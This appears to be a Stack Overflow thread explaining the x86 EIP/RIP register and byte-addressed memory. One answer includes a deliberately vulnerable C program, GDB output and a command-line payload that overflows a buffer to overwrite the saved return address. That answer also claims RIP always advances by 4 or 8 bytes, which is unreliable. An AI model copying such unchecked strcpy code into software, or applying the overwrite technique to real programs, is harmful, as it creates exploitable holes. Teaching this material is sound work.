# Understanding how EIP (RIP) register works?

Tags: assembly, x86, gdb, cpu-registers, cpu-architecture

I'm a complete novice to computer architecture and the low level stuff that happens at the processor/memory level. I'll start by saying that. What i've done with computers has pretty much always been at the high level programming level. C++, Java, etc.

That being said, I'm currently reading a book that is starting to delve into the low level programming stuff, assembly, registers, pointers, etc. I'm having a hard time understanding how the EIP register works.

From what is said in the book, each memory address has one byte, and each byte has a memory address.

From what I'm reading about the EIP register, it points to the next set of instructions for the processor to do. While using debugging tools (GDB) to follow along in the book, if you were to examine memory at a particular location, say:

x/8xb it allegedly lets you examine the first 8 bytes at the memory address. But if each memory address has only 1 byte, I don't understand. Can someone help me understand this? I have looked for thorough explanations of how this register works and functions but I can't really find anything

Comment: This is a practical question about a concrete architecture, it's an engineering question, not a science question, so I'm migrating it to a site where it's on-topic.

Comment: It's showing the 8 bytes at sequentially increasing memory addresses from the one specified.

Comment: They aren't all *at* that same address. You can easily see this if you make the address one or two higher and then show 8 bytes again.

Comment: When they say "8 bytes at a particular address", what they mean is "8 bytes in the chunk of memory that starts at the address". Second, third bytes and so on would have greater addresses.

Comment: Are you still interested in an answer to the question?

Answer (score 9, accepted):

Let's begin with a concrete, x86-specific example.

```
00000000000020b0 <foo>:
    20b0: 89 d1                         movl    %edx, %ecx
    20b2: 89 f8                         movl    %edi, %eax
    20b4: 0f af c6                      imull   %esi, %eax
    20b7: 31 d2                         xorl    %edx, %edx
    20b9: f7 f1                         divl    %ecx
    20bb: c3                            ret
```

For the sake of simplicity and of this example, think of memory as a gigantic "array" of bytes, and think of memory addresses as indexes into such an "array"<sup>0</sup>. When something lies at a given memory address, that essentially means that its first byte lies at that address, its second byte (if it's more than just a byte big) lies at the next address, and so on. For example, `foo` starts at address `0x20B0`<sup>1</sup> and spans 12 bytes. This means that each address from `0x20B0` to `0x20BB` (inclusive) points to a byte in the function.

The program counter in x86, called `RIP` (`EIP` if 32-bit), points to the next instruction<sup>2</sup>. For example, if the current instruction being executed is the one at `0x20B2`, `RIP` would contain the value `0x20B4`. Because of the CISC nature of x86, instruction sizes differ, so `RIP` does not necessarily increase by a fixed amount each time.

```
00000000000020b0 <foo>:
    20b0: 89 d1                         movl    %edx, %ecx
EX->20b2: 89 f8                         movl    %edi, %eax
PC->20b4: 0f af c6                      imull   %esi, %eax
    20b7: 31 d2                         xorl    %edx, %edx
    20b9: f7 f1                         divl    %ecx
    20bb: c3                            ret
```

In the next "iteration", EX (not a real register, just a way to mark what's being executed) will point to the `imull` instruction, and PC (`RIP`) will point to the `xorl` instruction, and so on until the `ret` instruction, at which point the return address, which is stored on the stack, will be loaded into `RIP` so that execution may continue at the caller of `foo`.

---

<sup>0</sup> As mentioned by Peter Cordes, there are some architectures out there where this does not apply. For the sake of the question, this answer is specific to x86.
<sup>1</sup> That's not actually the address at which this function would be found at runtime, but pretend it is for the sake of example.
<sup>2</sup> There are some architectures where the program counter points to the current instruction (AArch64 does this), or even to two instructions ahead (AArch32 does this).

Answer (score 2):

The [instruction pointer](https://en.wikipedia.org/wiki/Program_counter) is normally a register (a memory) on the microprocessor which increments with 4 (4 bytes) for a 32-bit system and 8 (i.e. 8 bytes) for a 64-bit system so that it points to the next instrution.

When the program enters a function, a saved instruction pointer (ip/rip/eip) is the return address, which is the address where the function should jump back after termination.

> From what is said in the book, each memory address has one byte, and
>   each byte has a memory address.

That seems like an 8-bit computer then which is not our usual real situation. If we look at a certain program for example:

```
#include <stdio.h>
#include <string.h>

char * pwd = "pwd0";

void print_my_pwd() {
  printf("your pwd is: %s\n", pwd);
}

int check_pwd(char * uname, char * upwd) {
  char name[8];
  strcpy(name, uname);

  if (strcmp(pwd, upwd)) {
    printf("non authorized\n");
    return 1;
  }
  printf("authorized\n");
  return 0;
}

int main(int argc, char ** argv) {
  check_pwd(argv[1], argv[2]);
  return 0;
}
```

I can build it and examine it with gdb.

```
$ make
gcc -O0 -ggdb -o main main.c -fno-stack-protector
$ gdb main
GNU gdb (Ubuntu 8.2-0ubuntu1~18.04) 8.2
Copyright (C) 2018 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from main...done.
(gdb) b check_pwd
Breakpoint 1 at 0x76c: file main.c, line 12.
(gdb) run joe f00b4r42
Starting program: /home/developer/main joe f00b4r42
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Breakpoint 1, check_pwd (uname=0x7fffffffdc01 "joe", upwd=0x7fffffffdc05 "f00b4r42") at main.c:12
12    strcpy(name, uname);
(gdb) info frame
Stack level 0, frame at 0x7fffffffd6d0:
 rip = 0x55555555476c in check_pwd (main.c:12); saved rip = 0x5555555547ef
 called by frame at 0x7fffffffd6f0
 source language c.
 Arglist at 0x7fffffffd6c0, args: uname=0x7fffffffdc01 "joe", upwd=0x7fffffffdc05 "f00b4r42"
 Locals at 0x7fffffffd6c0, Previous frame's sp is 0x7fffffffd6d0
 Saved registers:
  rbp at 0x7fffffffd6c0, rip at 0x7fffffffd6c8
```

You see above that the `saved rip` (the instruction pointer) is at `0x7fffffffd6c8` with the value `0x5555555547ef` (important difference between where it is and what it is). I can purposely overflow the program to overwrite this value with something else which I know:

```
(gdb) p &name
$1 = (char (*)[8]) 0x7fffffffd6b8
(gdb) p &print_my_pwd
$2 = (void (*)()) 0x55555555473a <print_my_pwd>
(gdb) Quit
```

Now I know the distance between `name` and `rip` (not the values but their locations): 0x7fffffffd6c8 - 0x7fffffffd6b8 = 16. So I write 16 bytes into the location of `name` so that I will write into the value of `rip` and what I write is the location of `print_my_pwd` which is `UUUUG:` and backwards because it is little-endian computer:

```
$ ./main $(python -c "print 'AAAAAAAAAAAAAAAA:GUUUU'") B
non authorized
your pwd is: pwd0
Segmentation fault (core dumped)
$
```

As you see, the input caused an overflow and wrote over the value of the instruction pointer and caused the instruction pointer to jump to the location of the function which prints the password.

Don't write code like this in real life but hopefully it helps to understand how it works and doesn't work when you don't check the bounds of your input.

Comment: *each memory address has one byte, and each byte has a memory address.* is exactly what we have on normal CPUs like x86.  It's called "byte addressable memory".  A 32-bit load from an address loads the bytes from 4 different addresses, selected by the lowest of the 4 addresses.

Comment: You're barely even answering the question *title*; you're talking about modifying saved RIP values on the stack without talking at all about how they get stores (by `call`) or reloaded (by `ret`).  Also important to point out that the input only *indirectly* overwrite the value of the instruction pointer.    RIP itself is a *register* and doesn't have a memory address.  Despite the exploit community calling return addresses just `rip` (not "saved RIP" or anything), that's just shorthand.  In computer architecture, the instruction-pointer is the register itself.

Comment: @PeterCordes _"each memory address has one byte"_ - for example a register on a 32-bit microprocessor is a memory with a memory address and it contains a 32-bit number which is significantly more than one byte isn't it? Or did I misunderstand the statement? I also updated my answer with link to program counter/instruction pointer saying what it is in general. I think that the example of overflow puts the usage of the PC into a context. For the details one could consult the Hennessy-Patterson book or the David Harris book ("Digital Design") but the PC is just for the for control flow.

Comment: Yes, every byte has its own address, but you can still say a 7-byte instruction like `mov rax, -123` has *an address*, that being the address of its lowest byte.  Even though the instruction bytes actually come from 7 different addresses.  Or for data, `mov rax, [rdi]` does an 8-byte load *from the address in RDI*.  It's the address of a byte, but also the address of a qword (and word and dword).  But on a word-addressable machine (like some DSPs), only whole words have separate addresses and the smallest possible load is a word.  https://en.wikipedia.org/wiki/Word-addressable